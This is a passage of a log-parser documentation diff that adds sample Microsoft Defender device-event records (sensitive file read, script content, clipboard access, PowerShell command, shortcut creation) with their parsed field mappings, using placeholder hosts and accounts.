args.manifest_keys))\\\\n except:\\\\n sys.stderr.write(\\\\\\\"error while reading manifest of '{}': {}\\\\\\\\n\\\\\\\".format(self.path, traceback.format_exc()))\\\\n\\\\n if throw_on_error:\\\\n raise\\\\n\\\\n return {}\\\\n\\\\n def manifest(self, throw_on_error=False):\\\\n if not self._manifest:\\\\n self._manifest = self._read_manifest(throw_on_error)\\\\n return self._\\\"}\", \"InitiatingProcessAccountSid\": null, \"AppGuardContainerId\": null, \"InitiatingProcessSHA256\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"RemoteUrl\": null, \"ProcessCreationTime\": null, \"ProcessTokenElevation\": null, \"ActionType\": \"ScriptContent\", \"FileOriginUrl\": null, \"FileOriginIP\": null, \"InitiatingProcessLogonId\": 0, \"AccountSid\": null, \"RemoteDeviceName\": null, \"RegistryKey\": null, \"RegistryValueName\": null, \"RegistryValueData\": null, \"LogonId\": null, \"LocalIP\": null, \"LocalPort\": null, \"RemoteIP\": null, \"RemotePort\": null, \"ProcessId\": null, \"ProcessCommandLine\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"FileSize\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"CreatedProcessSessionId\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-10-22T15:09:08.851712Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", - "event": { - "category": [ - "host" - ], - "dataset": "device_events", - "type": [ - "info" - ] - }, - "@timestamp": "2024-10-22T15:09:08.851712Z", - "action": { - "properties": { - "InitiatingProcessLogonId": "0" - }, - "type": "ScriptContent" - }, - "file": { - "hash": { - "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" - } - }, - "host": { - "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca", - "name": "computer.intranet.example" - }, - "microsoft": { - "defender": { - "report": { - "id": "65306" - } - } - }, - "process": { - "parent": { - "pid": 0 - }, - "pid": 417271, - "start": "2024-10-22T15:09:08.624070Z" - }, - "related": { - "hash": [ - "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" - ] - } - } - - ``` - - === "test_detection_source.json" ```json @@ -960,6 +965,407 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_device_event_sensitive_file_read.json" + + ```json + + { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:17:24.858829Z", + "action": { + "properties": { + "AccountSid": "S-1-2-3", + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "InitiatingProcessCommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "InitiatingProcessFileSize": 3316224, + "InitiatingProcessLogonId": "5223047", + "InitiatingProcessVersionInfoCompanyName": "Test Corporation", + "InitiatingProcessVersionInfoFileDescription": "Browser EXE", + "InitiatingProcessVersionInfoInternalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoOriginalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoProductName": "Test Product", + "InitiatingProcessVersionInfoProductVersion": "1, 0, 0, 1" + }, + "type": "SensitiveFileRead" + }, + "file": { + "directory": "C:\\Log", + "name": "FileName.mdb", + "size": 286720 + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "73291" + } + } + }, + "process": { + "args": [ + "/DBMode", + "/Network", + "/ProjectID", + "/Ticket", + "0", + "0", + "12345678-1234-5678-9012-345678901234", + "123456789" + ], + "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "executable": "c:\\program files (x86)\\browser.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "browser.exe", + "parent": { + "name": "Windows.exe", + "pid": 1820, + "start": "2024-10-14T05:47:54.324381Z" + }, + "pid": 1328, + "start": "2024-11-12T10:17:23.990532Z", + "user": { + "domain": "company", + "email": "USERNAME@COMPANY.COM", + "id": "S-1-2-3", + "name": "username" + }, + "working_directory": "c:\\program files (x86)" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } + + ``` + + +=== "test_device_events_2.json" + + ```json + + { + "message": "{\"time\": \"2024-10-22T15:10:29.9681180Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:09:20.5220737Z\", \"properties\": {\"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"DeviceName\": \"computer.intranet.example\", \"ReportId\": 65306, \"InitiatingProcessId\": 417271, \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:08.62407Z\", \"InitiatingProcessCommandLine\": null, \"InitiatingProcessParentFileName\": null, \"InitiatingProcessParentId\": 0, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessSHA1\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": null, \"InitiatingProcessFolderPath\": null, \"InitiatingProcessAccountName\": null, \"InitiatingProcessAccountDomain\": null, \"SHA1\": null, \"MD5\": null, \"FileName\": null, \"FolderPath\": null, \"AccountName\": null, \"AccountDomain\": null, \"AdditionalFields\": \"{\\\"ScriptContent\\\":\\\"# sudo python3 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo python2 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo rm /opt/microsoft/mdatp/resources/cache/log4j_handlersV2.json \\\\n\\\\nfrom genericpath import isdir\\\\nimport os\\\\nimport re\\\\nimport sys\\\\nimport json\\\\nfrom datetime import datetime as dt\\\\nimport zipfile\\\\nimport string\\\\nimport argparse\\\\nimport traceback\\\\nimport functools\\\\nimport itertools\\\\nimport subprocess as sb\\\\n\\\\nMAX_FILE_SIZE = 1024 * 1024 # 1MB\\\\nMANIFEST_OLD_PATH = \\\\\\\"META-INF/MANIFEST.MF\\\\\\\"\\\\n\\\\ndef take(n, l):\\\\n for i, item in enumerate(l):\\\\n if i > n:\\\\n break\\\\n yield item\\\\n\\\\nclass Jar:\\\\n def __init__(self, path):\\\\n self.path = path\\\\n self._manifest = {}\\\\n self._dirlist = []\\\\n\\\\n def _parse_manifest(self, lines):\\\\n version_indication = \\\\\\\"version=\\\\\\\"\\\\n version_lines = [line for line in lines if line.startswith(version_indication)]\\\\n\\\\n if len(version_lines) > 0:\\\\n version = version_lines[0][len(version_indication):]\\\\n yield 'Version', version.strip()\\\\n\\\\n field_names = ['Specification-Version', 'Specification-Title', 'Specification-Vendor', 'Implementation-Version', 'Implementation-Title', 'Implementation-Vendor']\\\\n for line in lines:\\\\n if any(line.startswith(field_name) for field_name in field_names):\\\\n key, value = line.split(':')\\\\n yield key.strip(), value.strip()\\\\n\\\\n def _open(self):\\\\n if not zipfile.is_zipfile(self.path):\\\\n raise ValueError(\\\\\\\"path is not a zip file: {}\\\\\\\".format(self.path))\\\\n return zipfile.ZipFile(self.path)\\\\n\\\\n def _read_dirlist(self):\\\\n with self._open() as zf:\\\\n filenames = dict(p for p in zf.namelist())\\\\n return [f for f in filenames if any(r.search(f.lower()) for r in args.dirlist)]\\\\n\\\\n\\\\n\\\\n def _get_manifest_path(self, zf):\\\\n for path in [args.manifest_path, MANIFEST_OLD_PATH]:\\\\n if path in zf.namelist():\\\\n return path\\\\n\\\\n def _read_manifest(self, throw_on_error=False):\\\\n try:\\\\n with self._open() as zf:\\\\n manifest_path = self._get_manifest_path(zf)\\\\n if not manifest_path:\\\\n # Not found manifest file\\\\n return {}\\\\n\\\\n manifest_info = zf.getinfo(manifest_path)\\\\n if manifest_info.file_size > MAX_FILE_SIZE:\\\\n raise IOError(\\\\\\\"manifest file is too big\\\\\\\")\\\\n\\\\n with zf.open(manifest_path) as f:\\\\n readline_f = functools.partial(f.readline, MAX_FILE_SIZE)\\\\n manifest_lines = list(x.decode().strip() for x in iter(readline_f, b''))\\\\n manifest = self._parse_manifest(manifest_lines)\\\\n return dict((k, v) for k, v in manifest\\\\n if not args.manifest_keys or any(m.search(k.lower()) for m in args.manifest_keys))\\\\n except:\\\\n sys.stderr.write(\\\\\\\"error while reading manifest of '{}': {}\\\\\\\\n\\\\\\\".format(self.path, traceback.format_exc()))\\\\n\\\\n if throw_on_error:\\\\n raise\\\\n\\\\n return {}\\\\n\\\\n def manifest(self, throw_on_error=False):\\\\n if not self._manifest:\\\\n self._manifest = self._read_manifest(throw_on_error)\\\\n return self._\\\"}\", \"InitiatingProcessAccountSid\": null, \"AppGuardContainerId\": null, \"InitiatingProcessSHA256\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"RemoteUrl\": null, \"ProcessCreationTime\": null, \"ProcessTokenElevation\": null, \"ActionType\": \"ScriptContent\", \"FileOriginUrl\": null, \"FileOriginIP\": null, \"InitiatingProcessLogonId\": 0, \"AccountSid\": null, \"RemoteDeviceName\": null, \"RegistryKey\": null, \"RegistryValueName\": null, \"RegistryValueData\": null, \"LogonId\": null, \"LocalIP\": null, \"LocalPort\": null, \"RemoteIP\": null, \"RemotePort\": null, \"ProcessId\": null, \"ProcessCommandLine\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"FileSize\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"CreatedProcessSessionId\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-10-22T15:09:08.851712Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-22T15:09:08.851712Z", + "action": { + "properties": { + "InitiatingProcessLogonId": "0" + }, + "type": "ScriptContent" + }, + "file": { + "hash": { + "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" + } + }, + "host": { + "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca", + "name": "computer.intranet.example" + }, + "microsoft": { + "defender": { + "report": { + "id": "65306" + } + } + }, + "process": { + "parent": { + "pid": 0 + }, + "pid": 417271, + "start": "2024-10-22T15:09:08.624070Z" + }, + "related": { + "hash": [ + "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" + ] + } + } + + ``` + + +=== "test_device_events_get_clipboard_data.json" + + ```json + + { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:19:26.502777Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "InitiatingProcessCommandLine": "\"OUTLOOK.EXE\" ", + "InitiatingProcessFileSize": 44152968, + "InitiatingProcessLogonId": "389220681", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Outlook", + "InitiatingProcessVersionInfoInternalFileName": "Outlook", + "InitiatingProcessVersionInfoOriginalFileName": "Outlook.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Outlook", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" + }, + "type": "GetClipboardData" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.company.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "157950" + } + } + }, + "process": { + "command_line": "\"OUTLOOK.EXE\" ", + "executable": "c:\\program files\\microsoft office\\root\\outlook.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "outlook.exe", + "parent": { + "name": "exec.exe", + "pid": 18840, + "start": "2024-11-12T08:44:15.150395Z" + }, + "pid": 12824, + "start": "2024-11-12T10:09:31.100455Z", + "user": { + "domain": "account-domain", + "email": "john.doe@account-domain.fr", + "id": "S-1-2-3", + "name": "john.doe" + }, + "working_directory": "c:\\program files\\microsoft office\\root" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } + + ``` + + +=== "test_device_events_powershell_command.json" + + ```json + + { + "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:15:59.550882Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + "InitiatingProcessCommandLine": "powershell.exe", + "InitiatingProcessFileSize": 450560, + "InitiatingProcessLogonId": "398124703", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows PowerShell", + "InitiatingProcessVersionInfoInternalFileName": "POWERSHELL", + "InitiatingProcessVersionInfoOriginalFileName": "PowerShell.EXE", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "10.0.22621.3085" + }, + "type": "PowerShellCommand" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.name.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "134294" + } + } + }, + "process": { + "command_line": "powershell.exe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "powershell.exe", + "parent": { + "name": "WindowsTerminal.exe", + "pid": 884, + "start": "2024-11-12T09:20:42.824676Z" + }, + "pid": 27568, + "start": "2024-11-12T10:15:16.487111Z", + "user": { + "domain": "domain", + "email": "JDOE@domain.fr", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\windows\\system32\\windowspowershell\\v1.0" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } + + ``` + + +=== "test_device_events_shell_link_create_file.json" + + ```json + + { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JO